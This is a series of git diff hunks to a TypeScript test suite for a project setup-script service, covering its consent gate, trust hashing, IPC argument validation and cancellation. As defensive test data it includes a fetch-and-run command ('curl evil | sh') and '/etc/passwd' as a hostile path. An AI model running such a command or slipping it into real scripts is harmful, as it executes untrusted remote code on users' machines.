@@ -492,58 +505,73 @@ describe('registerProjectSetupHandlers', () => {
     expect(() => plat.listeners[IPC.projectSetupUnsubscribe]('p1')).not.toThrow()
   })
 
-  it('passes a well-formed target through and answers a malformed one instead of throwing', async () => {
+  it('derives rootPath/projectName from projectTargetInfo — the wire carries only projectId/kind', async () => {
     const { runs } = stub()
     const call = plat.handlers[IPC.projectSetupRun]
-    const ssh = { server: { host: 'h', user: 'u', port: 2222 }, remoteCwd: '/srv/app' }
-    expect(await call({ ...target(), worktreePath: '/wt', ssh, bogus: 'x' }, 'archive')).toMatchObject({
-      status: 'started'
-    })
-    expect(runs[0][1]).toBe('archive')
-    expect(runs[0][0]).toEqual({ ...target(), worktreePath: '/wt', ssh })
-
-    for (const bad of [null, {}, { projectId: 'p', projectName: 'n' }, 'nope']) {
-      expect(await call(bad, 'setup')).toEqual({ status: 'skipped', reason: 'unavailable' })
-    }
-    expect(await call(target(), 'launch')).toEqual({ status: 'skipped', reason: 'unavailable' })
+    expect(await call('p1', 'archive')).toMatchObject({ status: 'started' })
     expect(runs).toHaveLength(1)
+    expect(runs[0]).toEqual([{ projectId: 'p1', projectName: 'App', rootPath: '/proj/app' }, 'archive'])
   })
 
-  it('rejects a malformed ssh target instead of stripping it down to a LOCAL run', async () => {
+  it('derives an ssh target from projectTargetInfo alone — nothing ssh-shaped is on the wire', async () => {
+    const ssh = { server: { host: 'h', user: 'u', port: 2222 }, remoteCwd: '/srv/app' }
+    const { runs } = stub({ projectTargetInfo: (id) => (id === 'p1' ? { name: 'App', ssh } : null) })
+    const call = plat.handlers[IPC.projectSetupRun]
+    expect(await call('p1', 'setup')).toMatchObject({ status: 'started' })
+    expect(runs[0][0]).toEqual({ projectId: 'p1', projectName: 'App', rootPath: '/srv/app', ssh })
+  })
+
+  it('answers unavailable for a malformed call instead of throwing, and never calls service.run', async () => {
     const { runs } = stub()
     const call = plat.handlers[IPC.projectSetupRun]
-    const bad = [
-      'garbage',
-      7,
-      { server: { host: 'h' } },
-      { server: { host: 'h', user: 'u' } }, // no remoteCwd
-      { server: { host: 'h', user: 'u', port: '22' }, remoteCwd: '/srv' },
-      { server: { host: 'h', user: 'u', identityFile: 3 }, remoteCwd: '/srv' },
-      { server: 'h@u', remoteCwd: '/srv' }
-    ]
-    for (const ssh of bad) {
-      expect(await call({ ...target(), ssh }, 'setup')).toEqual({ status: 'skipped', reason: 'unavailable' })
+    for (const args of [[null, 'setup'], [7, 'setup'], ['', 'setup'], ['p1', 'launch'], ['p1', null]] as const) {
+      expect(await call(...args)).toEqual({ status: 'skipped', reason: 'unavailable' })
     }
+    // A non-string worktreePath (a hostile/buggy caller) is refused outright, not coerced.
+    expect(await call('p1', 'setup', 42)).toEqual({ status: 'skipped', reason: 'unavailable' })
     expect(runs).toHaveLength(0)
   })
 
-  it('end to end: a malformed ssh target never reaches the local runner', async () => {
+  it('refuses an unknown projectId — service.run is never reached', async () => {
+    const { runs } = stub()
+    const call = plat.handlers[IPC.projectSetupRun]
+    expect(await call('missing', 'setup')).toEqual({ status: 'skipped', reason: 'unavailable' })
+    expect(runs).toHaveLength(0)
+  })
+
+  it('refuses a relative worktreePath — service.run is never reached', async () => {
+    const { runs } = stub()
+    const call = plat.handlers[IPC.projectSetupRun]
+    expect(await call('p1', 'setup', 'relative/path')).toEqual({ status: 'skipped', reason: 'unavailable' })
+    expect(runs).toHaveLength(0)
+  })
+
+  it('refuses a hostile absolute worktreePath that is not one of the project\'s actual git worktrees', async () => {
+    const { runs } = stub({ worktreeList: okWorktrees(['/proj/app.worktrees/real-branch']) })
+    const call = plat.handlers[IPC.projectSetupRun]
+    expect(await call('p1', 'setup', '/etc/passwd')).toEqual({ status: 'skipped', reason: 'unavailable' })
+    expect(runs).toHaveLength(0)
+  })
+
+  it('accepts a worktreePath that matches one of the project\'s actual git worktrees', async () => {
+    const wt = '/proj/app.worktrees/real-branch'
+    const { runs } = stub({ worktreeList: okWorktrees([wt]) })
+    const call = plat.handlers[IPC.projectSetupRun]
+    expect(await call('p1', 'setup', wt)).toMatchObject({ status: 'started' })
+    expect(runs[0][0]).toEqual({ projectId: 'p1', projectName: 'App', rootPath: '/proj/app', worktreePath: wt })
+  })
+
+  it('end to end: an unknown projectId never reaches the local runner', async () => {
     const { calls, runner } = recorder()
     const service = new ProjectSetupService({
       trust: new ProjectTrustStore(),
       readSettings: async () => snapshot(null, { setup: { setupScript: 'echo hi' } }),
       runLocal: runner
     })
-    registerProjectSetupHandlers(plat, service)
+    registerProjectSetupHandlers(plat, service, defaultDeps())
     const call = plat.handlers[IPC.projectSetupRun]
-    expect(await call({ ...target(), ssh: 'garbage' }, 'setup')).toEqual({
-      status: 'skipped',
-      reason: 'unavailable'
-    })
-    expect(await call({ ...target(), ssh: { server: { host: 'h' } } }, 'setup')).toEqual({
-      status: 'skipped',
-      reason: 'unavailable'
-    })
+    expect(await call('missing', 'setup')).toEqual({ status: 'skipped', reason: 'unavailable' })
+    expect(await call('p1', 'setup', '/etc/passwd')).toEqual({ status: 'skipped', reason: 'unavailable' })
     expect(calls).toHaveLength(0)
   })
 

--- a/src/core/project-setup-service.test.ts
+++ b/src/core/project-setup-service.test.ts
@@ -623,3 +623,116 @@ describe('registerProjectSetupHandlers', () => {
     expect(consents).toEqual([['r1', 'approve']])
   })
 })
+
+/**
+ * The consent prompt carries the SCRIPT BODIES of a shared settings file — the exact bytes a human
+ * is being asked to authorize. `platform().broadcast` on the desktop fans out to every relay peer
+ * (a paired phone, another desktop), so broadcasting the prompt would hand a guest the contents of
+ * a file they may have no other way to read, and show them a dialog only the host may answer. The
+ * shell therefore injects WHERE a prompt goes; the default stays broadcast, which is right for the
+ * Server Edition (every attached client there is an authenticated operator of that host).
+ */
+describe('ProjectSetupService — consent delivery seam', () => {
+  const seam = (): { sent: Array<{ channel: string; payload: unknown }>; send: (channel: string, payload: unknown) => void } => {
+    const sent: Array<{ channel: string; payload: unknown }> = []
+    return { sent, send: (channel, payload) => sent.push({ channel, payload }) }
+  }
+
+  it('routes the consent REQUEST through sendConsent, never through the peer-fanning broadcast', async () => {
+    const s = seam()
+    const { calls, runner } = recorder()
+    const svc = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(sharedFile({ setup: { setupScript: 'npm ci --registry=secret' } })),
+      runLocal: runner,
+      sendConsent: s.send
+    })
+    const pending = svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(s.sent).toHaveLength(1))
+    expect(s.sent[0].channel).toBe(IPC.projectSetupConsentRequest)
+    const req = s.sent[0].payload as ProjectSetupConsentRequest
+    expect(req.scripts).toEqual({ setup: 'npm ci --registry=secret' })
+    // The script body never entered the broadcast fan-out at all.
+    expect(consentRequests()).toEqual([])
+    expect(JSON.stringify(plat.sent)).not.toContain('secret')
+
+    svc.submitConsent(req.requestId, 'approve')
+    expect(await pending).toMatchObject({ status: 'started' })
+    await vi.waitFor(() => expect(calls).toHaveLength(1))
+    // Run EVENTS keep broadcasting: they are the canvas's own run state, not the approval question.
+    await vi.waitFor(() => expect(events().some((e) => e.state === 'done')).toBe(true))
+  })
+
+  it('routes the DISMISS through the same seam (cancel and expiry alike)', async () => {
+    const s = seam()
+    const { runner } = recorder()
+    const svc = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(sharedFile({ setup: { setupScript: 'npm ci' } })),
+      runLocal: runner,
+      sendConsent: s.send
+    })
+    const pending = svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(s.sent).toHaveLength(1))
+    const { requestId } = s.sent[0].payload as ProjectSetupConsentRequest
+
+    expect(svc.cancel(setupRunKey(target(), 'setup'))).toBe(true)
+    expect(s.sent[1]).toEqual({ channel: IPC.projectSetupConsentDismiss, payload: { requestId } })
+    expect(dismissed()).toEqual([]) // and not to the peers
+    expect(await pending).toEqual({ status: 'skipped', reason: 'declined' })
+  })
+})
+
+/**
+ * A local run is a DETACHED process group (setsid), deliberately, so a cancel can SIGKILL the whole
+ * tree. The same property means an app quit leaves one running with nothing left to report to:
+ * `npm ci` keeps churning after the window is gone. Every shell's shutdown path calls disposeAll.
+ */
+describe('ProjectSetupService — disposeAll', () => {
+  it('aborts every active run, so each runner sees its own signal fire', async () => {
+    const aborted: string[] = []
+    const runner: ProjectSetupRunner = ({ cwd, signal }) =>
+      new Promise((resolve) => {
+        signal.addEventListener('abort', () => {
+          aborted.push(cwd)
+          resolve({ exitCode: 137 })
+        })
+      })
+    const svc = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(null, { setup: { setupScript: 'sleep 100' } }),
+      runLocal: runner
+    })
+    const a = await svc.run(target({ projectId: 'p1', rootPath: '/a' }), 'setup')
+    const b = await svc.run(target({ projectId: 'p2', rootPath: '/b' }), 'setup')
+    expect([a.status, b.status]).toEqual(['started', 'started'])
+
+    svc.disposeAll()
+    expect(aborted.sort()).toEqual(['/a', '/b'])
+    await vi.waitFor(() => expect(events('p1').at(-1)?.state).toBe('cancelled'))
+    await vi.waitFor(() => expect(events('p2').at(-1)?.state).toBe('cancelled'))
+
+    // Idempotent: a second pass (Electron runs before-quit twice) has nothing left to abort.
+    expect(() => svc.disposeAll()).not.toThrow()
+    expect(aborted).toHaveLength(2)
+  })
+
+  it('also closes a run still waiting at its consent dialog, and dismisses that dialog', async () => {
+    const s: Array<{ channel: string; payload: unknown }> = []
+    const { calls, runner } = recorder()
+    const svc = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(sharedFile({ setup: { setupScript: 'npm ci' } })),
+      runLocal: runner,
+      sendConsent: (channel, payload) => s.push({ channel, payload })
+    })
+    const pending = svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(s).toHaveLength(1))
+    const { requestId } = s[0].payload as ProjectSetupConsentRequest
+
+    svc.disposeAll()
+    expect(s[1]).toEqual({ channel: IPC.projectSetupConsentDismiss, payload: { requestId } })
+    expect(await pending).toEqual({ status: 'skipped', reason: 'declined' })
+    expect(calls).toHaveLength(0)
+  })
+})

--- a/src/core/project-setup-service.test.ts
+++ b/src/core/project-setup-service.test.ts
@@ -166,7 +166,13 @@ describe('ProjectSetupService — consent gate', () => {
     const pending = svc.run(target(), 'setup')
     await vi.waitFor(() => expect(consentRequests()).toHaveLength(1))
     const req = consentRequests()[0]
-    expect(req).toMatchObject({ kind: 'setup', projectName: 'App', script: 'npm ci', previouslyApproved: false })
+    expect(req).toMatchObject({
+      kind: 'setup',
+      projectName: 'App',
+      // The dialog is handed the WHOLE family, because that is what one answer approves.
+      scripts: { setup: 'npm ci', archive: 'rm -rf node_modules' },
+      previouslyApproved: false
+    })
     expect(req.locationLabel).toContain('/proj/app')
     expect(calls).toHaveLength(0)
 
@@ -182,6 +188,73 @@ describe('ProjectSetupService — consent gate', () => {
     await vi.waitFor(() => expect(calls).toHaveLength(2))
     expect(calls[1].script).toBe('rm -rf node_modules')
     expect(consentRequests()).toHaveLength(1)
+  })
+
+  it('hashes and shows the SHARED family only — a local override never enters the trust content', async () => {
+    const trust = new ProjectTrustStore()
+    const { calls, runner } = recorder()
+    // The two documents disagree about the family's OTHER script. The merged/effective doc would
+    // hash `local-archive`; only the shared doc may be approved.
+    const shared: ProjectSettingsDoc = { setup: { setupScript: 'npm ci', archiveScript: 'shared-archive' } }
+    const merged: ProjectSettingsDoc = { setup: { setupScript: 'npm ci', archiveScript: 'local-archive' } }
+    const svc = new ProjectSetupService({
+      trust,
+      readSettings: async () => snapshot(sharedFile(shared), { setup: { archiveScript: 'local-archive' } }),
+      runLocal: runner
+    })
+    const pending = svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(1))
+    expect(consentRequests()[0].scripts).toEqual({ setup: 'npm ci', archive: 'shared-archive' })
+    svc.submitConsent(consentRequests()[0].requestId, 'approve')
+    expect(await pending).toMatchObject({ status: 'started' })
+    await vi.waitFor(() => expect(calls).toHaveLength(1))
+
+    const key = localTrustKey('/proj/app')
+    const record = await trust.getRecord(key, 'setup')
+    expect(record?.contentHash).toBe(hashTrustContent(projectTrustContent('setup', shared)!))
+    expect(record?.contentHash).not.toBe(hashTrustContent(projectTrustContent('setup', merged)!))
+  })
+
+  it('a local override of a shared script is local-sourced: it runs promptless', async () => {
+    const { calls, runner } = recorder()
+    const svc = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () =>
+        snapshot(sharedFile({ setup: { setupScript: 'npm ci' } }), { setup: { setupScript: 'my own setup' } }),
+      runLocal: runner
+    })
+    expect(await svc.run(target(), 'setup')).toMatchObject({ status: 'started' })
+    await vi.waitFor(() => expect(calls).toHaveLength(1))
+    expect(calls[0].script).toBe('my own setup')
+    expect(consentRequests()).toEqual([])
+  })
+
+  it('cancel while the dialog is open dismisses it, and a late approve cannot revive the run', async () => {
+    const trust = new ProjectTrustStore()
+    const { calls, runner } = recorder()
+    const svc = new ProjectSetupService({
+      trust,
+      readSettings: async () => snapshot(sharedFile({ setup: { setupScript: 'npm ci' } })),
+      runLocal: runner
+    })
+    const pending = svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(1))
+    const { requestId } = consentRequests()[0]
+
+    expect(svc.cancel(setupRunKey(target(), 'setup'))).toBe(true)
+    expect(dismissed()).toEqual([requestId])
+    expect(await pending).toEqual({ status: 'skipped', reason: 'declined' })
+
+    svc.submitConsent(requestId, 'approve')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(1))
+    expect(calls).toHaveLength(0)
+    expect(await trust.getRecord(localTrustKey('/proj/app'), 'setup')).toBeNull()
+    expect(events()).toEqual([])
+    // The queue is free again: the next project still gets its dialog.
+    const next = svc.run(target({ projectId: 'p2', rootPath: '/b' }), 'setup')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(2))
+    svc.submitConsent(consentRequests()[1].requestId, 'skip')
+    await next
   })
 
   it('skip does not run and does not record', async () => {
@@ -271,7 +344,7 @@ describe('ProjectSetupService — consent gate', () => {
     expect(await second).toEqual({ status: 'skipped', reason: 'declined' })
     // Both were asked — one after the other, never both at once (the queue order itself is not
     // part of the contract).
-    expect(consentRequests().map((r) => r.script).sort()).toEqual(['build p1', 'build p2'])
+    expect(consentRequests().map((r) => r.scripts.setup).sort()).toEqual(['build p1', 'build p2'])
   })
 
   it('gates an ssh target on its ssh location key', async () => {
@@ -434,6 +507,44 @@ describe('registerProjectSetupHandlers', () => {
     }
     expect(await call(target(), 'launch')).toEqual({ status: 'skipped', reason: 'unavailable' })
     expect(runs).toHaveLength(1)
+  })
+
+  it('rejects a malformed ssh target instead of stripping it down to a LOCAL run', async () => {
+    const { runs } = stub()
+    const call = plat.handlers[IPC.projectSetupRun]
+    const bad = [
+      'garbage',
+      7,
+      { server: { host: 'h' } },
+      { server: { host: 'h', user: 'u' } }, // no remoteCwd
+      { server: { host: 'h', user: 'u', port: '22' }, remoteCwd: '/srv' },
+      { server: { host: 'h', user: 'u', identityFile: 3 }, remoteCwd: '/srv' },
+      { server: 'h@u', remoteCwd: '/srv' }
+    ]
+    for (const ssh of bad) {
+      expect(await call({ ...target(), ssh }, 'setup')).toEqual({ status: 'skipped', reason: 'unavailable' })
+    }
+    expect(runs).toHaveLength(0)
+  })
+
+  it('end to end: a malformed ssh target never reaches the local runner', async () => {
+    const { calls, runner } = recorder()
+    const service = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(null, { setup: { setupScript: 'echo hi' } }),
+      runLocal: runner
+    })
+    registerProjectSetupHandlers(plat, service)
+    const call = plat.handlers[IPC.projectSetupRun]
+    expect(await call({ ...target(), ssh: 'garbage' }, 'setup')).toEqual({
+      status: 'skipped',
+      reason: 'unavailable'
+    })
+    expect(await call({ ...target(), ssh: { server: { host: 'h' } } }, 'setup')).toEqual({
+      status: 'skipped',
+      reason: 'unavailable'
+    })
+    expect(calls).toHaveLength(0)
   })
 
   it('cancel and consent-submit reject junk arguments', async () => {

--- a/src/core/project-setup-service.test.ts
+++ b/src/core/project-setup-service.test.ts
@@ -1,0 +1,450 @@
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
+import { promises as fs } from 'fs'
+import os from 'os'
+import path from 'path'
+import { initPlatform, resetPlatformForTests } from './platform'
+import { fakePlatform, type FakePlatform } from './platform-fake'
+import { ProjectTrustStore, localTrustKey, sshTrustKey, hashTrustContent } from './project-trust-store'
+import {
+  projectTrustContent,
+  type ProjectSettingsDoc,
+  type ProjectSettingsFileV1,
+  type ProjectSettingsSnapshot,
+  type ProjectLocalSettings,
+  type ProjectSetupConsentRequest,
+  type ProjectSetupEvent
+} from '../shared/project-settings'
+import { IPC } from '../shared/ipc'
+import {
+  ProjectSetupService,
+  setupRunKey,
+  type ProjectSetupRunner,
+  type ProjectSetupTarget
+} from './project-setup-service'
+import { registerProjectSetupHandlers } from './project-setup-handlers'
+
+let userData: string
+let plat: FakePlatform
+
+beforeEach(async () => {
+  userData = await fs.mkdtemp(path.join(os.tmpdir(), 'nt-setup-svc-'))
+  plat = fakePlatform({ userDataDir: userData })
+  initPlatform(plat)
+})
+afterEach(async () => {
+  vi.useRealTimers()
+  resetPlatformForTests()
+  await fs.rm(userData, { recursive: true, force: true })
+})
+
+const target = (over: Partial<ProjectSetupTarget> = {}): ProjectSetupTarget => ({
+  projectId: 'p1',
+  projectName: 'App',
+  rootPath: '/proj/app',
+  ...over
+})
+
+const sharedFile = (doc: ProjectSettingsDoc): ProjectSettingsFileV1 => ({
+  version: 1,
+  rev: 1,
+  savedAt: '2026-08-19T00:00:00.000Z',
+  ...doc
+})
+
+const snapshot = (
+  shared: ProjectSettingsFileV1 | null,
+  local?: ProjectLocalSettings
+): ProjectSettingsSnapshot => ({ shared, local })
+
+const consentRequests = (): ProjectSetupConsentRequest[] =>
+  plat.sent
+    .filter((s) => s.channel === IPC.projectSetupConsentRequest)
+    .map((s) => s.args[0] as ProjectSetupConsentRequest)
+
+const dismissed = (): string[] =>
+  plat.sent
+    .filter((s) => s.channel === IPC.projectSetupConsentDismiss)
+    .map((s) => (s.args[0] as { requestId: string }).requestId)
+
+const events = (projectId = 'p1'): ProjectSetupEvent[] =>
+  plat.sent
+    .filter((s) => s.channel === IPC.projectSetupEvent(projectId))
+    .map((s) => s.args[0] as ProjectSetupEvent)
+
+interface RunnerRecorder {
+  calls: Array<{ script: string; cwd: string; env: Record<string, string> }>
+  runner: ProjectSetupRunner
+}
+const recorder = (exitCode = 0): RunnerRecorder => {
+  const calls: RunnerRecorder['calls'] = []
+  const runner: ProjectSetupRunner = async ({ script, cwd, env, onChunk }) => {
+    calls.push({ script, cwd, env })
+    onChunk('building\n')
+    return { exitCode }
+  }
+  return { calls, runner }
+}
+
+describe('setupRunKey', () => {
+  it('is a location+kind identity, not a project id', () => {
+    const a = setupRunKey(target({ projectId: 'a' }), 'setup')
+    const b = setupRunKey(target({ projectId: 'b' }), 'setup')
+    expect(a).toBe(b)
+    expect(setupRunKey(target(), 'archive')).not.toBe(a)
+    expect(setupRunKey(target({ rootPath: '/other' }), 'setup')).not.toBe(a)
+    expect(
+      setupRunKey(target({ ssh: { server: { host: 'h', user: 'u' }, remoteCwd: '/proj/app' } }), 'setup')
+    ).not.toBe(a)
+  })
+})
+
+describe('ProjectSetupService — local-sourced scripts', () => {
+  it('runs a local-sourced script without any consent prompt', async () => {
+    const { calls, runner } = recorder()
+    const svc = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(null, { setup: { setupScript: 'echo hi', waitForSetup: true } }),
+      runLocal: runner
+    })
+    const res = await svc.run(target(), 'setup')
+    expect(res).toEqual({ status: 'started', runKey: setupRunKey(target(), 'setup'), waitForSetup: true })
+    expect(consentRequests()).toEqual([])
+
+    await vi.waitFor(() => expect(events().some((e) => e.state === 'done')).toBe(true))
+    expect(calls).toHaveLength(1)
+    expect(calls[0].script).toBe('echo hi')
+    expect(calls[0].cwd).toBe('/proj/app')
+    expect(calls[0].env).toEqual({
+      NODETERM_ROOT_PATH: '/proj/app',
+      NODETERM_WORKTREE_PATH: '/proj/app',
+      NODETERM_PROJECT_NAME: 'App'
+    })
+    const seen = events()
+    expect(seen[0].state).toBe('running')
+    expect(seen.map((e) => e.seq)).toEqual(seen.map((_, i) => i + 1))
+    expect(seen.some((e) => e.chunk === 'building\n')).toBe(true)
+    const done = seen[seen.length - 1]
+    expect(done).toMatchObject({ state: 'done', exitCode: 0, kind: 'setup' })
+  })
+
+  it('spawns in the worktree dir and reports a non-zero exit as failed', async () => {
+    const { calls, runner } = recorder(3)
+    const svc = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(null, { setup: { setupScript: 'false' } }),
+      runLocal: runner
+    })
+    const t = target({ worktreePath: '/proj/app-wt' })
+    expect(await svc.run(t, 'setup')).toMatchObject({ status: 'started', waitForSetup: false })
+    await vi.waitFor(() => expect(events().some((e) => e.state === 'failed')).toBe(true))
+    expect(calls[0].cwd).toBe('/proj/app-wt')
+    expect(calls[0].env.NODETERM_WORKTREE_PATH).toBe('/proj/app-wt')
+    expect(calls[0].env.NODETERM_ROOT_PATH).toBe('/proj/app')
+    expect(events().at(-1)).toMatchObject({ state: 'failed', exitCode: 3 })
+  })
+})
+
+describe('ProjectSetupService — consent gate', () => {
+  it('prompts once for a shared-sourced script; approve records the hash and runs', async () => {
+    const trust = new ProjectTrustStore()
+    const doc: ProjectSettingsDoc = { setup: { setupScript: 'npm ci', archiveScript: 'rm -rf node_modules' } }
+    // The whole family is approved by one answer: setup+archive are hashed together.
+    const hash = hashTrustContent(projectTrustContent('setup', doc)!)
+    const calls: Array<{ script: string }> = []
+    const trustedAtSpawn: boolean[] = []
+    const runner: ProjectSetupRunner = async ({ script }) => {
+      calls.push({ script })
+      // The approval is persisted BEFORE anything runs — never "run first, record after".
+      trustedAtSpawn.push(await trust.isTrusted(localTrustKey('/proj/app'), 'setup', hash))
+      return { exitCode: 0 }
+    }
+    const svc = new ProjectSetupService({
+      trust,
+      readSettings: async () => snapshot(sharedFile(doc)),
+      runLocal: runner
+    })
+    const pending = svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(1))
+    const req = consentRequests()[0]
+    expect(req).toMatchObject({ kind: 'setup', projectName: 'App', script: 'npm ci', previouslyApproved: false })
+    expect(req.locationLabel).toContain('/proj/app')
+    expect(calls).toHaveLength(0)
+
+    svc.submitConsent(req.requestId, 'approve')
+    expect(await pending).toMatchObject({ status: 'started' })
+    await vi.waitFor(() => expect(events().some((e) => e.state === 'done')).toBe(true))
+    expect(calls).toHaveLength(1)
+    expect(trustedAtSpawn).toEqual([true])
+    expect(await trust.isTrusted(localTrustKey('/proj/app'), 'setup', hash)).toBe(true)
+
+    // Second run of the same, still-trusted family: no second prompt.
+    expect(await svc.run(target(), 'archive')).toMatchObject({ status: 'started' })
+    await vi.waitFor(() => expect(calls).toHaveLength(2))
+    expect(calls[1].script).toBe('rm -rf node_modules')
+    expect(consentRequests()).toHaveLength(1)
+  })
+
+  it('skip does not run and does not record', async () => {
+    const trust = new ProjectTrustStore()
+    const { calls, runner } = recorder()
+    const svc = new ProjectSetupService({
+      trust,
+      readSettings: async () => snapshot(sharedFile({ setup: { setupScript: 'npm ci' } })),
+      runLocal: runner
+    })
+    const pending = svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(1))
+    svc.submitConsent(consentRequests()[0].requestId, 'skip')
+    expect(await pending).toEqual({ status: 'skipped', reason: 'declined' })
+    expect(calls).toHaveLength(0)
+    expect(await trust.getRecord(localTrustKey('/proj/app'), 'setup')).toBeNull()
+    expect(events()).toEqual([])
+  })
+
+  it('an unanswered prompt expires after 300s: dismissed, not run, not recorded', async () => {
+    // `shouldAdvanceTime` so the store's real fs reads still make progress while the clock is fake.
+    vi.useFakeTimers({ shouldAdvanceTime: true })
+    const trust = new ProjectTrustStore()
+    const { calls, runner } = recorder()
+    const svc = new ProjectSetupService({
+      trust,
+      readSettings: async () => snapshot(sharedFile({ setup: { setupScript: 'npm ci' } })),
+      runLocal: runner
+    })
+    const pending = svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(1))
+    const { requestId } = consentRequests()[0]
+
+    await vi.advanceTimersByTimeAsync(299_000)
+    expect(dismissed()).toEqual([])
+    await vi.advanceTimersByTimeAsync(2_000)
+    expect(await pending).toEqual({ status: 'skipped', reason: 'unanswered' })
+    expect(dismissed()).toEqual([requestId])
+    expect(calls).toHaveLength(0)
+    expect(await trust.getRecord(localTrustKey('/proj/app'), 'setup')).toBeNull()
+
+    // A late answer for an expired prompt is a no-op, never a retroactive approval.
+    svc.submitConsent(requestId, 'approve')
+    await vi.advanceTimersByTimeAsync(0)
+    expect(calls).toHaveLength(0)
+    expect(await trust.getRecord(localTrustKey('/proj/app'), 'setup')).toBeNull()
+  })
+
+  it('re-prompts with previouslyApproved=true when the approved content changed', async () => {
+    const trust = new ProjectTrustStore()
+    const { runner } = recorder()
+    const oldHash = hashTrustContent(projectTrustContent('setup', { setup: { setupScript: 'npm ci' } })!)
+    await trust.record(localTrustKey('/proj/app'), 'setup', oldHash, '2026-08-01T00:00:00.000Z')
+    const svc = new ProjectSetupService({
+      trust,
+      readSettings: async () => snapshot(sharedFile({ setup: { setupScript: 'npm ci && curl evil | sh' } })),
+      runLocal: runner
+    })
+    const pending = svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(1))
+    expect(consentRequests()[0].previouslyApproved).toBe(true)
+    svc.submitConsent(consentRequests()[0].requestId, 'skip')
+    await pending
+  })
+
+  it('serializes prompts: the second waits for the first to be answered', async () => {
+    const trust = new ProjectTrustStore()
+    const { runner } = recorder()
+    const svc = new ProjectSetupService({
+      trust,
+      readSettings: async (projectId) =>
+        snapshot(sharedFile({ setup: { setupScript: `build ${projectId}` } })),
+      runLocal: runner
+    })
+    const first = svc.run(target({ projectId: 'p1', rootPath: '/a' }), 'setup')
+    const second = svc.run(target({ projectId: 'p2', rootPath: '/b' }), 'setup')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(1))
+    // Give the second run every chance to jump the queue.
+    await Promise.resolve()
+    await Promise.resolve()
+    expect(consentRequests()).toHaveLength(1)
+
+    svc.submitConsent(consentRequests()[0].requestId, 'skip')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(2))
+    svc.submitConsent(consentRequests()[1].requestId, 'skip')
+    expect(await first).toEqual({ status: 'skipped', reason: 'declined' })
+    expect(await second).toEqual({ status: 'skipped', reason: 'declined' })
+    // Both were asked — one after the other, never both at once (the queue order itself is not
+    // part of the contract).
+    expect(consentRequests().map((r) => r.script).sort()).toEqual(['build p1', 'build p2'])
+  })
+
+  it('gates an ssh target on its ssh location key', async () => {
+    const trust = new ProjectTrustStore()
+    const calls: Array<ProjectSetupTarget['ssh']> = []
+    const runSsh: ProjectSetupRunner = async ({ ssh }) => {
+      calls.push(ssh)
+      return { exitCode: 0 }
+    }
+    const ssh = { server: { host: 'h', user: 'u' }, remoteCwd: '/srv/app' }
+    const svc = new ProjectSetupService({
+      trust,
+      readSettings: async () => snapshot(sharedFile({ setup: { setupScript: 'npm ci' } })),
+      runSsh
+    })
+    const pending = svc.run(target({ ssh }), 'setup')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(1))
+    expect(consentRequests()[0].locationLabel).toBe('u@h:/srv/app')
+    svc.submitConsent(consentRequests()[0].requestId, 'approve')
+    expect(await pending).toMatchObject({ status: 'started' })
+    await vi.waitFor(() => expect(calls).toHaveLength(1))
+    const hash = hashTrustContent(projectTrustContent('setup', { setup: { setupScript: 'npm ci' } })!)
+    expect(await trust.isTrusted(sshTrustKey(ssh), 'setup', hash)).toBe(true)
+    expect(await trust.isTrusted(localTrustKey('/proj/app'), 'setup', hash)).toBe(false)
+  })
+})
+
+describe('ProjectSetupService — single-flight, cancel and absent scripts', () => {
+  it('a second run for the same target while one is live is busy', async () => {
+    let release: (() => void) | undefined
+    const gate = new Promise<void>((r) => {
+      release = r
+    })
+    let started = 0
+    const runner: ProjectSetupRunner = async () => {
+      started++
+      await gate
+      return { exitCode: 0 }
+    }
+    const svc = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(null, { setup: { setupScript: 'sleep 1' } }),
+      runLocal: runner
+    })
+    expect(await svc.run(target(), 'setup')).toMatchObject({ status: 'started' })
+    await vi.waitFor(() => expect(started).toBe(1))
+    expect(await svc.run(target(), 'setup')).toEqual({ status: 'skipped', reason: 'busy' })
+    expect(started).toBe(1)
+
+    release!()
+    await vi.waitFor(() => expect(events().some((e) => e.state === 'done')).toBe(true))
+    // Freed once it finished.
+    expect(await svc.run(target(), 'setup')).toMatchObject({ status: 'started' })
+    release!()
+  })
+
+  it('cancel aborts a live run and reports cancelled; an unknown runKey is false', async () => {
+    const runner: ProjectSetupRunner = ({ signal }) =>
+      new Promise((resolve) => {
+        signal.addEventListener('abort', () => resolve({ exitCode: 130 }))
+      })
+    const svc = new ProjectSetupService({
+      trust: new ProjectTrustStore(),
+      readSettings: async () => snapshot(null, { setup: { setupScript: 'sleep 100' } }),
+      runLocal: runner
+    })
+    const res = await svc.run(target(), 'setup')
+    expect(res.status).toBe('started')
+    const runKey = (res as { runKey: string }).runKey
+    expect(svc.cancel('nope')).toBe(false)
+    expect(svc.cancel(runKey)).toBe(true)
+    await vi.waitFor(() => expect(events().at(-1)?.state).toBe('cancelled'))
+  })
+
+  it('no script → no-script; ssh target without an ssh runner → unavailable', async () => {
+    const { runner } = recorder()
